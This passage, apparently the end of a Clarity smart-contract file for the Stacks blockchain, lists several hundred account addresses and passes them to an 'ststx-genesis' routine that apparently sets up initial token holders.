'SP294GG6MJJCHZ2BDV5PTMPK93MGYB2CY9VV5GG6D
'SP95VMG75YM7RVPXD872BWCCKVB133MP2ETPT80X
'SP2YA48SFRHAPJCGY3BJW6W8D8KB2R0F1RTSNSR6X
'SP27BSZ6FDW01Y1YT6NGRP8GPEXSJA52NJHRCKNDD
'SPFR5VAMH25SA8HK9KH8B1ZWA75RV4Y7K4XM93HQ
'SP20YFBN2X598K0X91GJCS3824CDKG7X2CH6D3S5J
'SP1ZAYQG7D89VKCE0HMST402X06KCDBDC4DPW6WTD
'SP3AWMHHYW1ZKTVWTH203BJWD9REG38CKC6KCBBMG
'SP254KAEQ0PKSAD342C0XRGG337WRDSB6SRRJ7FZT
'SP21HWX86H5HW2KBPDC6WXS7BNN10K7ZK81QGBCBV
'SP35JHG3TF4NPGM3524SWZN9F2QH2YT9BMFDWR7JT
'SP2M421BYKAZA7RNPDMWVACFEYPEJB89KCXFQQ7VW
'SP1D0MNS4KXBT8EPAHDP9K6TB8P2SW0ZZ2KFSRNY3
'SPN1ZG5DDY2ZC8F4X0RRM0CZZRH67QB99KB0X4H
'SP25XRCNW146V06VQGJD63HW15X9C73ENJ16081YQ
'SP2WSVX3NKX02QDXKHZYVFPJ39VE1SN8S7BKP5H43
'SP4J3CTTFH42RF6GTP00762766F8AJC63JK1X5N0
'SPN7YKH28A3NH7DAPYC88B280ZB35TXZB0D4T48B
'SP1322MFS0MF03WPGPS1DNYGTSSACZJCW4GE0W6SV
'SP1QHQHC9ZD605NET1E2ERGCZ465NVN0JNT4MDHB8
'SP289M1MZS1T8E8ANSRXBY2TF817A6YXBCDEZ1GWF
'SP1DYKMGEWHQTB4RQ9VWGKWA7JE40H3VT6DG1W4HQ
'SPBHVT63Q0HX0CW1D0F01MVKGCJV8TWX3XDXDP9A
'SPZ2K9N5YDAC59GCYDXX6AMAB1EW6W516C9XQV6E
'SP1DK8PCRR8TKPN53D4SCB0QF4GNCQWAFHBNMDZ28
'SP1KY2RGKBWTEFBAJWS0SX0P1PHXTXTHB9X528WXX
'SM2ZKKYGGHYX0A0MVC3M1S07W9WBHAZQGX3YTGTF4
'SP258QVE7T0MAFTMQX8FMTV325YHPZ9PCXCCWFEXB
'SP2X52XC75GMHR5KDMSTRD854KYTCN5796CW65KR
'SP388A3H00WFPC17NG0JA9XDY6HJV3QEXR9T6X04D
'SP23A44BMMHBNVEM9QKRQYT7YMNNJCPKZ5MSCE041
'SP3FPHJECBQB5NHFJHFDD3RCC0H0BD3TRWSX3QRBA
'SP1Q3FYKTYW5XWJ137XZ6TRD3NQGPHT3EFA7DGY1W
'SP1WHRMSMN5NZRK3C8K76AAV8NQJV812M1PD23R8P
'SP36281NGSRRVP9GJRA13JS6GMCT0MX15WC16YPS1
'SP1VRTTJDSHK3KG03MB177VESWP8G9RNT5R7PGEZG
'SP64M6T4CEP7DG8B5QM95R58VSPQ4EFMTZKM3W7R
'SP1N03XZ7WGRCBHN9J6619HSPCAXYPFZR8MZ5XC81
'SP1N5G2Q3MP3MCRXE6E94R3HPZW46WQNME5YCTXZ
'SP3VB8JXCGQCKR2NP9SE0D4W28TZ2AMF6TBVQ3EQA
'SP19BGSPKCK27WZVK85CW262QHWP20D7YTVSBMTGV
'SPM6J05REK8G2KEBV83PV112WNX0F22TYVX254NC
'SP1K7DF0FFY4H32K0PVP8V54NF4Z1RDC5TZGPJ8G1
'SP1HJDDMX2QHMVRDVVWQ9M3H8T2XQH8051X4Q3P52
'SP236VSV6KQ5FWYRNV0TXC3MX6PQ2GFP12FHQV9CD
'SP2ZV9W2G1V61HN184KHNB8F4BNK6PP9K8YAHPDZ8
'SPK2ERB1VSRMTBAQFJF5R878DYGRWHVXP578EKR5
'SP2V5D85EW1YWK1X8WAFDZKSN957BJ3A40E1GNGVH
'SP1SY774XDAHR6MGJ4JWNRAS6KJ4RYH9RSRV66H98
'SP3KSXYJHZ9AH3NYKY16MNM1YNJ1E0GDT1SM68AGF
'SP35QCXQPZ71GB62VMD8A74S0YA0FJP14J17WMMRY
'SP2W2D506WP294Q6RZKVTD8HVTXJ91B38EXPM255H
'SP37651B3DHBCX6YRV7S81H5V1GW6D4H4196EEY3W
'SP12P4J60TVMWP2TQYEB5E2ZA7AZSY7H3MXPB3P3Z
'SPBDE7JWZNKTY642H3WP9B2EQVF8FJ6YB75FKATE
'SP3G7RZVGCX0JHJRQM3TTFM19A7JJ52D6YVVGS0YN
'SP1NRZ7Y6454YF828Y354HFGHJ7VEAXY26P0QZRAA
'SP3D4N80S622SC7DKHBHF95TZ64KKFSVC3XVSZVHD
'SP1WER3PVSMYG7ADK9YKWWK3ZFAKRSXCJVDD1RRSN
'SPYE76FEEPWVQ4JP0QDHN701WPVW6N8JQF9ASAB
'SP2MJQBTKQB00SVMZH90N2F8Y4K490BV2KK7C47FP
'SP2GG5X3M0MABDZCW9XPNQK2P852N9N0FEEZ8RZ1K
'SPCXWB5DX8P546XVJCBEWHDX2DR7HG9JJ7F725H0
'SPKXAZ8WRABNCWPQ3BFSRF8N29H3AGV9164873PQ
'SP34JCJC5P4Q7V09X7983WH2058VSG6ENMFAE9WK1
'SP2VXTY4MMCXW2S6C1KYE5A3SEHFAEJ6Z13P3B61D
'SP50SA2805PVXPRT8QDWB4342Q3JGDZ6PHYAZ3RC
'SP32HSX3174BR1X9NAYWE3FZ0R06GJF9PDCY6HPA2
'SP2TBHKWC7H41CZRKSNA2Q6M8SC5DSK1E18SD9MZJ
'SPJE0XFYFJX2K6BMPZXD5FQXQVB9F17VT3NCB4Z6
'SP16KTB5CW9F7BS8NY9FFR7MR4XCPW0DHVPH5BD00
'SP2W9JC4BV70X9JEGGGEA8EYM3HF2BW83PE8J21CX
'SP2NWEEASQ8GTGJMBC5BEDNNFZY2N3KDAJHRM02HC
'SP1RNANZSX5EWSZXBN7CAZ3N0S9N0X4J2QMKJX3Q6
'SPZBDFRV5T47B5383E925MD69A7T0VZAK8AJEYEK
'SP1PSYNK6TC5ZN8VZRRE5FWCDS6WKGYM3HDG20P7S
'SP3XFSS6D2FPECBVVT9Z0VD2ZNBB2MV9FR8JCD7EN
'SP3EK8XKH26GZJAW36T37BWQKA27NCQDT9RPT9DPK
'SPZ0EDB8Z5W9GBEZRZ20SMKDEF5ESC4HWW6A19F6
'SP3SK2FNNGRDAQ9T9GWBXFN1FHHM9WBWB4W8P5ERH
'SPX420N0ME3E1X7QVQM1XV4K2MPDM4WFPG4SHCV8
'SP37SY5DRQ6Q8S92XCH1SN5Y3CP52MEAAHMJ1HMTR
'SP2D5TVJKVXBA5ENH0G732ZSM7NRBMHPMJX6RH61W
'SP29TMNTJ826HJ27T0Z68FYPC3XVSVSXD4YQNN2SY
'SP6DB77Y1N2181W2MXR7CGJ5YPWZADGBW7ZNW7X2
'SP1P2BN30QB7ZWFN7Z6GP0E21FKYEWF6P1Z54S184
'SP2Z749MXCYR5HH89CW3HDAQGYTAA07W7WE1D0S22
'SP3WBJ00RBT0BB6K1WW6Y41VRG3ZPEKXVB2GP8CGE
'SP1HAVT4ZVN3942FE2QXJNH7RXFABWTAT3J480GTA
'SP7ZJHCTH7N48MM2HV4WAVMGK9G4NR27SV08CF5F
'SP25EV6W08DK6TGMC7ENRYWQC2DP61XV6BBMVA02E
'SP5PJS5A2X97PB6N22TKCJZSFA2CQA5JHRG71E0F
'SP2MH88N1Y0GYWT6J4Q5RC14AT4B4KZS7THC1KWGA
'SP26AC4BRSN2AKK1H7QGQYE3VMK0YQ4BH3AS87DG3
'SP1ZHK0WSW4661FATWS6GQ6YZKG3CQGW6HN3CHDM4
'SPT6CQP20SGVVXPPRE9QVJPFNYBXJZNEATJBXJYH
'SP18ZVM3BJTHMWEE4256WK8D2C0VY143Q256PV98Y
'SPCSW32DKK81K9FVAB20ZJS2R4H7ZRAP23GSVD9A
'SP3VCT0B6T1QWBSJAEMBQMX9160HQ2BQ2K681PYF9
'SP359695E3Y3XQ8QZ1638NBMJQHKQNH89MYNRV6E0
'SP33NGGVNW07SAQB3F1074QVPAHYRSGNP09FJ46XB
'SP1W8P06E9SS48KR0Y9M579DVM027W5SM00JZB2YF
'SP1KNRNZET8ZC5Q9P6F1FFW8YQH45CKMNY132B36S
'SP3DZE8CEZ0AWX828XKKYXXTYHJBE65DZ5R2MY5JY
'SP2YKJSBV0PJP7CS08999GHVMWBGW8PQMZMAPVADA
'SPSSFQT3WPFZYBSB16ACE7JJGXC4WASGTY2KZKD
'SP15YKST07Y9EBKYP1CAQCER3AHN3BFWKNBXBT0SR
'SP82V4V5ZT5DH5YG894F9174R7GY8BFZ2BA3025T
'SP3R2048BAA1F96VQEJTXRFMMCQE57RQ9CX9D9YY
'SP3Q2XR52YGG9P09K56Y9Y11Y2B96GYMNE39Y49DS
'SPKN65R26G0217PQB64YMKSXSDRDV6B57F3VHMQV
'SPT10ST37N76J3F83GC8CC9HNSWP7QCB1AWJ2P7Z
'SP01XBVMJGJ56SBJY645JKFZQEGGGN3NFC5AJTF3
'SP13BRFYFDXW0H7DZ18AWHJV3ETN25GMJPNMRGDTA
'SP14XEKF7G8Q4WFYBSE77XSDMM67GTVF95R4V680
'SPN8PHMPRD93M9S2M2P464GZ683REKJKEMYZM564
'SP13ACKSAAGAQKVSH481JJ03VPC9AXTPE1WGCNVTJ
'SPT4W1CX3PJR7MMK4YYJWTSF6RG3ZYTJXH7PP6B8
'SP2E6QMW4ZSJ0GKCWFKE2WY3TXRZCN68M3ZWGC7FF
'SP3DFDBYRYK7XNKGGD13ZQP2J6NVBCF99CFEBQ8NN
'SP2VZ2RVMRCSNE0B12PKZSYDSN4N7CNS82D5HH197
'SP2PBHXAC6QDCZA4YWZV5WT0SAAH8C4901W555PYM
'SP370ED0V35GGNBVBXGN3T98DTDNSQJ3H1941RTTF
'SPHFAXDZVFHMY8YR3P9J7ZCV6N89SBET203ZAY25
'SP1DDPV2GYKFFVPRF7JD0Y7M1ZB00GHHH1A41VZB0
'SP2HCD0731GCKA1VN2WYR84FR24Y5J9KXM3M3JHAZ
'SP3972JQG6BSWXQTPK8D9ZGPXBRAGC2PMJ9AZKXAX
'SPMDSBCS4MJGRY26DYH8EJAK10A02ND1J6BP0KN4
'SP2YYR14XBRJYDJ2M419KF71354Q96BZH3DJTWGGQ
'SP3MMYJSZ12DZ6EEWWX5RB5X1A1ZET2CWA36JEN5C
'SP27JR1BD7Y5VR2V4AATBHCXMWVA2B0W7THMKA9KS
'SP3BXEC5GA3W9KQ5NV95BWM7Q4WMBZSQHYXY9YRWV
'SP2PGXMVVDQTE1VW2JWNDQKDJNWRMF7NVDMP2WSZZ
'SP3A3Q7Y28W2E6FS230975J91R3CBH5YNS7SNS3RV
'SP2XVXCZ49X2PDRG8A6KWJN1Z199HZ9CSSHP1RFB4
'SP2MKQ4TQGHJ58RQC95ATMP6BJRK62XZYF0PCG1K3
'SP1XAYENT27ADTH2W3XSQM4B5M0DZX9NK1EAGHEXZ
'SP3RSP5C86FDAYJ5T12EKBZPCGTGBRM6AH6KWYA9S
'SPN9JGFGXFJZD7AM5VF2S7BRATNCQYVHVWG3087B
'SP14DE735VZ8SA9EP9ZDJ5GAJPBCDZCRTDZ9FPA5P
'SP34CMZ1F8EQ4A3Q8SKK9FSQ168FDWD0Y6BEPJPWC
'SP29C5KZCCGX342DY9G9RWQ1GZVJF6E3ZY9Z72D7Z
'SP309E0VXYBBQ849BMB3A6EKQ2F68BY5F6CPP1BRB
'SP2XNSW4DSWVY0E7WRXVGW6K353QBTE2J0T14CBMC
'SP2PKPPXSVQ444V02V2CEJ37PZJQY4Q7YSHY5NN9Z
'SP31F11ZN8SJAF1GKMT9XM9V3XDN1A5R5PYRTRMNJ
'SP2NPTCBF0D83293K4D08AXF0K2MGTW92X38FW4PJ
'SPW2C35KYNMVV314NMPJVM4SJB9E2VS4R9VEN6RW
'SP288KQJCH45HHXNY9XAEGGWW4KJFVDY4MY74GE21
'SP2VDQ9XERE6NGJ8JMQNCA62FTWYZRDDPQWYZYFA5
'SP1Q78PY4CNPWPJY2EJ6W98BDX62TM1GYRG45X4YM
'SP2HKE8MH44EEFS4DJX1K9GZH6Z7FB0Q47C9ANYZG
'SP9RQPBS7JJBADZA5BGM36HCDQDR8RVWW0BB9CYG
'SP3MND3Z2BB4C8PHWKHNGVR6FEA7D4GR3H1VEMJCJ
'SP122WYWYNPCY1BANRHT5NB8GYFYPX5PDK790EEFY
'SP36YM0BJ9TMXB82HRTT4XD8B7XQQC7F4Z19MGDGN
'SP3R8D17GRN17AG0PZRKGF7XFA99J1YDJEZES43SW
'SP2QK2D0ZJGZTJGVFPBSQD2FAVH7DQM8K5NQQ0YXH
'SP3G4GTGJ49W7NFBXBK2706PMHQSES83G91G5NV75
'SPQSR67YE4ZEQ4941C6YSKTJNRYRV96ANKQHY81N
'SP1SYFX0W7SMP9ATR85ZGN4KE94VRMRX9ZVG0VAZX
'SP15TGW8QTVBSJ7H2JZKC2QH18N8WZHR655DTQWR
'SP2ZJT3YG7C7JMAY1WX05MZG439C0G1RS1992YGFQ
'SP5PZRNX2C6FE3WFSJSJ34P2ZA95T2XTK8PNCED0
'SP3FX7F6M57TRB7WJQ9W2HPQ5J38YM8MP60HK3XS5
'SP2R2RJ55V8WHWTZK20BTF2ZE161B7BKTV1H3E5DE
'SP3Q1YPJS40K91JQRWSSM7AAEGSHS63VYF7PZ6FK2
'SPRP47TQEFGG96FNT8N1ATJMP2G01K2FF9K4ZV02
'SPEH9QEGPYV1G8TQ7326RAAWC447V4JATZGK85ZC
'SP1NVFMA28ZYZAVN9MEBCCXJQ9NXWM2D2QF0TR74G
'SP19XE1AH782W168RP3XRXDTD9HZKX99XWE9FXW6Y
'SPKXTHFGWY6JBA761TCCEWZ0XFYDA9XVAJ5DFK4F
'SP3MXAE493G7RZDM19Q0ZPSKBJE7P3VCJPXN2RV5N
'SPJ9VRJMKKH5FQV4QB3SJBDAY1NP0E7SNSWB8R20
'SPQS3B13RD8R5DVHTKSENCRX06J15WMGCY7G2Y2Y
'SP18NSKFDJ60VDAVGMMPYRE7S31YHD3PCA4N60RHX
'SP2FYH8A1M2R59B00GWTMF9QQV85KS9ZAKZJ5ANRA
'SP3Z9NF9GF6413XG8HZ5664YWQ4C5VWF284A1EN7D
'SP11811FZ3XMFA5GHERF5KQY7SCDX6GKAGD9FRCGQ
'SPY9K49VE06A66ZXJ3S2ZMJXYJ8HQ08J4MAR4A3R
'SPJWKXYHXMRAK7JA3WP79CK5ANY026V23RC6JW8
'SP1VPAJY32NR1VVX8TK0F9QH803VREQGT22RPMJ8S
'SP3YQCJ0T2QMTE60P1BW5852FFPNVGT1KR2QPVWKH
'SP1DF01GG34BMYZSWZNVV987T58HG3HAPJFEB9GKA
'SP2W3Y4VWXSG4QBXVY403N7ABGJ30PY3EHNZN8ASP
'SP14GJZCXN82QJP0P7Q80K5XMFM7Q9SVAWKEG6X3T
'SPEAX8JW2E2TNZMH66VMYD7PT2AEJ7GX76H3EMNH
'SP1PCVP6479BG99RJ8MFR45RD767KS77RC9T7VQFC
'SP2CZP0VGN4DA08VX9N2EM0G1TDNHZD65TRBWDHE5
'SPW0JJHQ5A5QMF6V8BRES1726DZ6M8KWYBS31EYR
'SP1HR723JCGFM4EM9Q0RAEYYQ2ZAH0P45GBQHP9W2
'SP34X146B6JH8RF564A4NK9BE0NYF4AHB1J44BNF0
'SP2M7BKD7P78EASC8X2BV6928XAPBEX7JCS2E951J
'SP2E5VHFPHDS8G4ESN5PETV45GYW08C1R0NPGTTMP
'SP3NWB15474223S8ECS3F9FVBT8TAAC36P6GKTM3F
'SP391QB1MFP116GAAEMWFFM7N9AEYAR94PN5SH5PQ
'SP2YGNERVZZSS7ZBBWBF2P6WMTCAQ08W4DAMPEG1E
'SPXPX288STTTTFN71SHH1RHZJK976J229PC3TAMX
'SP1MFN31CSCFY299QC4WSAHZ5S7F9SGEKKWQ0JQKV
'SP2GG3FW5ZK4F5VR6QJ0QTJRZN81PJ3V7F3MZKGXK
'SP1SG0W20TPS2ZBKATG4J3DTYAE3WDMKR83J2EY62
'SP3WH4E86RDGKJWWBZT1QHET93M38AKB153CQ50J1
'SP0DJ1WEG91G0TA86F2EZ8DK23BT0WS0PME3ZWNE
'SP117H1CM9792VN4BP9F09W5VE0P422QMGEHR60BB
'SP1FDTB5TFT7HJ8NRSYJV1RWD3WQCN8JECDF5B6EC
'SPW4SHKB7H8NM8HTBP24YXFY71BT0QM8S0BVGAMY
'SPEFJYPE9PVB2DSH1X06GNW5278RHAS5WP27D3YS
'SPF876GG3Y4ADVM1ZFA142953C4M7CN5EFF1FFMK
'SP2Y6YVV22T8HBA82SJ1H62WJQV3ZQNPVPD3Q8886
'SP1N9ZPARMWKEQGAJ219QAC9QGF3RAWJSZBBF510S
'SPFSBGYXFJE41T5XPZA92TY6RJ68WA4PTS6MH4ZA
'SP2MYS2F77WK4VGK22EX3GQ6155BW63AJ3RDX8Y30
'SP1N10FVMT9909NGG7AYPD5RZWZP60FYRQRZSGS3Z
'SP1A4JXVWFFVB9RAQKQ5N3FBFJMAYYC2C04NRWKMQ
'SPP2HNHJTV31EK776R8AMNZS0D4M4R1PAEB785DH
'SP1TM2N47FDMJF07WH03QZNPZSGYG4SFYWXZNPA4R
'SP2XGEP04AS75NP0EVY8K0CYS84NJJRBWSDTYWZY6
'SPSPQG8HC1XM29Q97K2ZH6WEM5D2YPRW7F1EY5E7
'SP1QE7XVQT8DZ8051TAEH3K9M3D4CB10P18CZTQX8
'SP1ZCTXYDWH5S831HK6EXEVZ2TMDREBP9YFRN4CZK
'SPJEQKZA9CAC5E6B2T5J7QMNHXCP35V30C0YGEFB
'SP1B8DW9PKEX2ZA0BCAFM3GDASPGK5K7DS06JDYTW
'SP3WS65J8GACBVB8MVAQ20ZQ6B1G22NHAE2TD6XMP
'SPGPK4XQVZ333A16JMX4VENGJH3SH4V6XMD63BYY
'SPYA4ZBYACWVZGSY9Z8WZ3R1JY46GHS7K3J5Q4XW
'SP16MTGEBT7Y7FNBVXR4GYP91G4015TQWQTPCQJ77
'SP2WFH0V4Z05D0D23M0KNGH53N34YVWBJEK1NS59E
'SP3NKSPVD9RAHZ8AJ7492MRMFCS40JRTWMCYVWM6
'SP2MQNBWJERFT8Z5DYGSX82GVWWGN9BQDTWHBY0BM
'SPDG9P5A7AQYQ5K1BDPBFYGBVF8JG3XZD9BQ242S
'SP96XYE4G5V5TKHW7G6SC4NHCJDX2M8Z54ANF1MZ
'SPTNMQZZCSQ4ND2MW2MBP81RX3GCEF8ETQ5SDTFF
'SP2AQPKVB9M7EZAZTVYZGC4Z3KNQ5774ZWZY3T03J
'SP321FHVCQX1VC1C0HMHM144X110KCDSE0MF95DY8
'SP1H6MYMR58YFM4WPT74FYB7X0CEZ44S6HGKNAARR
'SP39ZMS6J08BPEB09SFTXYEFGYVACS2M9X06C2CNP
'SP1E2K8VWRH40H232F5RP32E185Q95CBQQJBAJFNS
'SP2WW9DZV64KYJ4WFZEJ6R2T3WR1NFCJ2YD9R7TNQ
'SP3F28PR7019DCMNZCAJHHSA02V26T2RVZHDWWMG2
'SP27FB5KXQPDZE5A4CYEVABC6ZAG42B0KKDDS455F
'SP3AR3Y2Y76S3RY657NFXGX10GCKMTEAYJJ4TW0T
'SP1BX0P4MZ5A3A5JCH0E10YNS170QFR2VQ6TT4NRH
'SP27FK1GPNSGMNR8X9D6EJKSDE7DV5P6T042DMK2J
'SP22KSVGVRFJ1BFQW86S755E751P1Z80FFJDA2B92
'SP1MFKRZ125WYMYK21BWPFATCQ2RVG2FT9PC3M8P1
'SP15ZF0Q2WH19A7X70P4XWZJ9DKYZA70DNQAH4C45
'SP3EMMA88HEDV49Y82CV4S48R6SH22PPYRPFP2QRH
'SP2JY20SY15CTABTGDS0P54DGB18M0ATZCA0T7MH0
'SMHAVPYZ8BVD0BHBBQGY5AQVVGNQY4TNHAKGPYP
'SP21EPCYKNME18KH5Z4EDB2VHCSNP25Y2VSV0W38X
'SPRSK9CGRT42617HWQY865MPTYTSP5JBNKTFAACA
'SP2DE3N8536JDKNRRCZV31A439SW1QYCF4QRGCNKD
'SP2DD50Z2MMWQM0RTZP2PGK12NFRHN7MWN2GY4BPT
'SPSHP74J2FRYZPD6MAKZWV0MPY5XG88328NMWQ2F
'SP1G4RRC0ZMH5X578KK1PZ2S5T51F2YH439AYWS9X
'SP87SR46GEBD05HXTKDC0CXQP033FRAG1BMWVSFW
'SP2FPSFE43W5RGX9XJ8VE5ZN0JB2359ZP5D7Q507Y
'SP3KGAG6NG533JFYZ6CX3XH8RJCP0TV30CJB9NKPC
'SP9DFWBQ3SSNMK6Q6ZEN68TKENE7VY8WXJG1GEF2
'SPVBNHN55AZQEPGJZ8FV46N4ZP6941TYWZM04WG9
'SP14DRMH7HSY3WNFPHC8GPQP25DA7M4B687H0FK7S
'SP8XXW0DNKEHHZ4BQCTM2W6PSNFMVX1WR8XBMHJX
'SP2R7YJCQFE1TJ8Z0539BQ9QPC5YHWJ9JJR68G56A
'SP2773365KN0BBVDXKGBA7XD5YX8JWAW8AQDTWPW4
'SP3AE95Q6G6YK301MNXFSFG1NN0PVBVQJQS7V3X9H
'SP432F9S80PYB4PXW0PNQ7WY4BNC7K9SPQS5WXYF
'SP2Y080RW2A7GKR4P47D1H27MBA6HSCG71VPBCKGS
'SP38PNP5MN91V3AKSTWQ08ZRHCD937112GJ7QX5VN
'SP2SCMMG7JBE463G6EKRXSJY93EKYSACWQJGWJJAP
'SPYGBJG9YCBWMRVZQ4ZN3G2CTCWZYMN3Z5QKF0W5
'SP1NA274Z09TQ9GGP93WSNF6XAAFZP14DQ0D8FYKY
'SPEJ6H8HKSC85BQVTZPT3MDDYQBHSW4SC0YMHHMZ
'SPW63P7X1KZ205RZG1J5G74GQ8JDY0HVNB2WD17D
'SP182SCKRAFQ90AQ6CM5TJSZ9DXM4YNM526BMN8TP
'SPZ7WY87JE89SAVBC0TQ48ZZBZ83007JV74Z2W91
'SP23K5F54G7NHAPW4R6GS3T9KQE642003M1SQMCDE
'SPFGQVSCEFKNV5HN0TVDSCCC03BDB2C9HDYD1MMM
'SP3CWKWPNWMFF9M2F0KWQ5ESVJ4YF8P6ST2RTFXJF
'SP2M8SSJD9E02V9E3Y0P3BHMP69G8NJEY4QMDAGE6
'SPN98KX6JF5YNH0YT1RWT2BG4BRR3JE6DMTG556F
'SP3WC3KVYBMXBSNP3BDQ2021TSGDN8T2RE9DMNGE0
'SPGM4RBXP6GM6M2FDCPVZYCKPK1FXYH1767XR7FC
'SP3Y0CH78Z3EAAE7HY61KER4MKWVCJVCNK60XH9P5
'SP1Q8Z7T0VM60FFCT0XA94W180RE30RH8FMB329CY
'SP17YG5A833SDJTSDKF1YY09GBHC2PTY22S0N36FP
'SP1RWT92JRGHBZ90X5C42DBKJ1JM72NCMTCP1EVVP
'SP3DBZ0SETBBDMZ9XGK47Q7TVHNCSRPXJ62DXTVV1
'SP3YB621W0E3JQFSD50DB7VVEFTHSYSTGN0VQFEXY
'SPFJHD5365NNXXDK28H8G4X8VCZPXS89MHMVSQXC
'SP2XB5CE01F5K5ZEXMQZN1XVT5RDY3Q6H91WR2EEW
'SPDQY3JA22WVKGSVY113EA4GF5MXQC2MX0CCM9BD
'SP3C96DH4SST3KF615DC0TG48G0FKN4FQGP4GYD4N
'SM1793C4R5PZ4NS4VQ4WMP7SKKYVH8JZEWSZ9HCCR
'SP3X9FJAANRRNM7DGRXJR7N2C2NGRE811ZG108HSE
'SPBK19EGWCZEAK40KHCTAH02DZRY3NN7KHTRKHXE
'SP1N658ZC5A16R9A1T8GD1C2HADQH61T8ECK4S13H
'SP4YQMP1EK42CYXJ2458VQBCP5DH4YEXRMKTE7WK
'SP3RP6XNTTGK81QQZ0KA8TQ9S8BMPPWS0YRW819EW
'SP3PS992RSJDHPXEXN3N8X70XBV0Y1V1JF40DRJ8K
'SP29H5FZXE2PQCWCDQDSQ8KFFS8BRRSFVC6SHJQDN
'SP2JM5YEWX6DXHQ20VPN7F8S6VCT37CX63J91AGVA
'SPYSHGWFNNGYF0CN9DY1JA3QZFC4YMBG27Q0MYF2
'SPRYQFB8MKT9HQ1C6WA8JX6STM7SSZKKMPCFRFHQ
'SP31A04FYPCC4W6VQMJBDWBSZJRJ3N4EKFQC13P7J
'SP3SCRS2PCNMZSJ7DA2S7D6ZE7X2YG48E557CBZ0Q
'SP80M1HTCHC18Z8CGP7Z2DPMJ2073KK0NY7HEY9Q
'SP1P197BSPB51KZWS6V15PWYRPRSVCPBCWSBP9NMD
'SP0A7AY1KDK11ZBH0CCS1J01HJXZ5G8814JJ2T7
'SP17XB0Y3BAAQKEQZF1TZTA6F5A0BN5WB116RME2A
'SP1FJMWNY8ZBB102R03T7QN4AW9CDQDVYFA7Q5ZRE
'SP3MK720J2557VMWD9SDJ47014MXPFTZQY5DCA0JG
'SP3YSQX2MVFCJ1JJ6CKC6BZK9WE0CSA5WJAQG4YX7
'SP3P6JN3G14EJCEAVDC56B2J6JE2NNZMT2Y2GDMF8
'SP26JZCE0NKT3W697PZJ8BBRMZXJ9B8G7F73AWSFH
'SP33E7NYDVWRAFEG7THV5A0SG4XJ69SQ5KF2TAD9E
'SPNJJF14C22GBQ67D30A9929Q1HP9WFCBF9DS0VK
'SP25EVTJDH970N9BM18HNST805FDTFGVPWS3AKN62
)))
    (ststx-genesis principals))
)